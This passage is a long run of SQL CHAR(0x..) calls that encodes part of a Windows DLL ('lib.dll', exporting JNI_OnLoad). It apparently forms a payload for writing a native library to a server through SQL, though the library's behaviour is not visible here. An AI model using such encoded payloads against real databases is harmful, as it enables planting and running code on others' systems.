00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x30),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x31),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x31),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x0f),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x24),CHAR(0x6d),CHAR(0x6e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x24),CHAR(0x6d),CHAR(0x6e),CHAR(0x24),CHAR(0x30),CHAR(0x30),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x92),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x24),CHAR(0x78),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x35),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x30),CHAR(0x30),CHAR(0x63),CHAR(0x66),CHAR(0x67),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x43),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x18),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x43),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x49),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x49),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x50),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x38),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x50),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x54),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x43),CHAR(0x52),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x54),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x36),CHAR(0x00),CHAR(0x00),CHAR(0x18),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x7a),CHAR(0x7a),CHAR(0x7a),CHAR(0x64),CHAR(0x62),CHAR(0x67),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x58),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x74),CHAR(0x63),CHAR(0x24),CHAR(0x49),CHAR(0x41),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x74),CHAR(0x63),CHAR(0x24),CHAR(0x49),CHAR(0x5a),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x74),CHAR(0x63),CHAR(0x24),CHAR(0x54),CHAR(0x41),CHAR(0x41),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x70),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x72),CHAR(0x74),CHAR(0x63),CHAR(0x24),CHAR(0x54),CHAR(0x5a),CHAR(0x5a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xa8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x78),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x65),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x32),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa4),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x33),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x34),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x69),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x24),CHAR(0x36),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x62),CHAR(0x73),CHAR(0x73),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0xc8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x2e),CHAR(0x70),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x2a),CHAR(0x09),CHAR(0x00),CHAR(0x18),CHAR(0x74),CHAR(0x6d),CHAR(0x00),CHAR(0x18),CHAR(0x64),CHAR(0x6c),CHAR(0x00),CHAR(0x18),CHAR(0x34),CHAR(0x6b),CHAR(0x00),CHAR(0x18),CHAR(0x01),CHAR(0x68),CHAR(0x00),CHAR(0x11),CHAR(0xe0),CHAR(0x00),CHAR(0x00),CHAR(0x2c),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x02),CHAR(0x01),CHAR(0x00),CHAR(0x02),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x04),CHAR(0x01),CHAR(0x00),CHAR(0x04),CHAR(0x42),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x11),CHAR(0x15),CHAR(0x08),CHAR(0x00),CHAR(0x15),CHAR(0x74),CHAR(0x09),CHAR(0x00),CHAR(0x15),CHAR(0x64),CHAR(0x07),CHAR(0x00),CHAR(0x15),CHAR(0x34),CHAR(0x06),CHAR(0x00),CHAR(0x15),CHAR(0x32),CHAR(0x11),CHAR(0xe0),CHAR(0xa6),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0xdb),CHAR(0x13),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x3e),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x06),CHAR(0x32),CHAR(0x02),CHAR(0x50),CHAR(0x11),CHAR(0x0a),CHAR(0x04),CHAR(0x00),CHAR(0x0a),CHAR(0x34),CHAR(0x08),CHAR(0x00),CHAR(0x0a),CHAR(0x52),CHAR(0x06),CHAR(0x70),CHAR(0xa6),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x83),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xa2),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x78),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xba),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x32),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xce),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0xcf),CHAR(0x14),CHAR(0x00),CHAR(0x00),CHAR(0x32),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x09),CHAR(0x1a),CHAR(0x06),CHAR(0x00),CHAR(0x1a),CHAR(0x34),CHAR(0x0f),CHAR(0x00),CHAR(0x1a),CHAR(0x72),CHAR(0x16),CHAR(0xe0),CHAR(0x14),CHAR(0x70),CHAR(0x13),CHAR(0x60),CHAR(0xa6),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x05),CHAR(0x15),CHAR(0x00),CHAR(0x00),CHAR(0xed),CHAR(0x15),CHAR(0x00),CHAR(0x00),CHAR(0x46),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xed),CHAR(0x15),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x06),CHAR(0x52),CHAR(0x02),CHAR(0x50),CHAR(0x01),CHAR(0x0f),CHAR(0x06),CHAR(0x00),CHAR(0x0f),CHAR(0x64),CHAR(0x07),CHAR(0x00),CHAR(0x0f),CHAR(0x34),CHAR(0x06),CHAR(0x00),CHAR(0x0f),CHAR(0x32),CHAR(0x0b),CHAR(0x70),CHAR(0x01),CHAR(0x09),CHAR(0x01),CHAR(0x00),CHAR(0x09),CHAR(0x62),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x08),CHAR(0x04),CHAR(0x00),CHAR(0x08),CHAR(0x72),CHAR(0x04),CHAR(0x70),CHAR(0x03),CHAR(0x60),CHAR(0x02),CHAR(0x30),CHAR(0x01),CHAR(0x06),CHAR(0x02),CHAR(0x00),CHAR(0x06),CHAR(0x32),CHAR(0x02),CHAR(0x30),CHAR(0x01),CHAR(0x0d),CHAR(0x04),CHAR(0x00),CHAR(0x0d),CHAR(0x34),CHAR(0x09),CHAR(0x00),CHAR(0x0d),CHAR(0x32),CHAR(0x06),CHAR(0x50),CHAR(0x09),CHAR(0x04),CHAR(0x01),CHAR(0x00),CHAR(0x04),CHAR(0x22),CHAR(0x22),CHAR(0x00),CHAR(0x00),CHAR(0xa6),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x23),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xab),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x7c),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xab),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x02),CHAR(0x01),CHAR(0x00),CHAR(0x02),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x14),CHAR(0x08),CHAR(0x00),CHAR(0x14),CHAR(0x64),CHAR(0x08),CHAR(0x00),CHAR(0x14),CHAR(0x54),CHAR(0x07),CHAR(0x00),CHAR(0x14),CHAR(0x34),CHAR(0x06),CHAR(0x00),CHAR(0x14),CHAR(0x32),CHAR(0x10),CHAR(0x70),CHAR(0x01),CHAR(0x15),CHAR(0x05),CHAR(0x00),CHAR(0x15),CHAR(0x34),CHAR(0xba),CHAR(0x00),CHAR(0x15),CHAR(0x01),CHAR(0xb8),CHAR(0x00),CHAR(0x06),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x0a),CHAR(0x04),CHAR(0x00),CHAR(0x0a),CHAR(0x34),CHAR(0x06),CHAR(0x00),CHAR(0x0a),CHAR(0x32),CHAR(0x06),CHAR(0x70),CHAR(0x01),CHAR(0x0f),CHAR(0x06),CHAR(0x00),CHAR(0x0f),CHAR(0x64),CHAR(0x06),CHAR(0x00),CHAR(0x0f),CHAR(0x34),CHAR(0x05),CHAR(0x00),CHAR(0x0f),CHAR(0x12),CHAR(0x0b),CHAR(0x70),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x52),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x5a),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x69),CHAR(0x62),CHAR(0x2e),CHAR(0x64),CHAR(0x6c),CHAR(0x6c),CHAR(0x00),CHAR(0x4a),CHAR(0x4e),CHAR(0x49),CHAR(0x5f),CHAR(0x4f),CHAR(0x6e),CHAR(0x4c),CHAR(0x6f),CHAR(0x61),CHAR(0x64),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x38),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x56),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x80),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x58),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0e),CHAR(0x3e),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb4),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xce),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe2),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xfe),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x7a),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa6),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xdc),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf2),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2c),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x74),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x82),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x94),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xae),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd0),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xec),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x3e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd3),CHAR(0x04),CHAR(0x52),CHAR(0x74),CHAR(0x6c),CHAR(0x43),CHAR(0x61),CHAR(0x70),CHAR(0x74),CHAR(0x75),CHAR(0x72),CHAR(0x65),CHAR(0x43),CHAR(0x6f),CHAR(0x6e),CHAR(0x74),CHAR(0x65),CHAR(0x78),CHAR(0x74),CHAR(0x00),CHAR(0xda),CHAR(0x04),CHAR(0x52),CHAR(0x74),CHAR(0x6c),CHAR(0x4c),CHAR(0x6f),CHAR(0x6f),CHAR(0x6b),CHAR(0x75),CHAR(0x70),CHAR(0x46),CHAR(0x75),CHAR(0x6e),CHAR(0x63),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x45),CHAR(0x6e),CHAR(0x74),CHAR(0x72),CHAR(0x79),CHAR(0x00),CHAR(0x00),CHAR(0xe1),CHAR(0x04),CHAR(0x52),CHAR(0x74),CHAR(0x6c),CHAR(0x56),CHAR(0x69),CHAR(0x72),CHAR(0x74),CHAR(0x75),CHAR(0x61),CHAR(0x6c),CHAR(0x55),CHAR(0x6e),CHAR(0x77),CHAR(0x69),CHAR(0x6e),CHAR(0x64),CHAR(0x00),CHAR(0x00),CHAR(0xbc),CHAR(0x05),CHAR(0x55),CHAR(0x6e),CHAR(0x68),CHAR(0x61),CHAR(0x6e),CHAR(0x64),CHAR(0x6c),CHAR(0x65),CHAR(0x64),CHAR(0x45),CHAR(0x78),CHAR(0x63),CHAR(0x65),CHAR(0x70),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x46),CHAR(0x69),CHAR(0x6c),CHAR(0x74),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x00),CHAR(0x7b),CHAR(0x05),CHAR(0x53),CHAR(0x65),CHAR(0x74),CHAR(0x55),CHAR(0x6e),CHAR(0x68),CHAR(0x61),CHAR(0x6e),CHAR(0x64),CH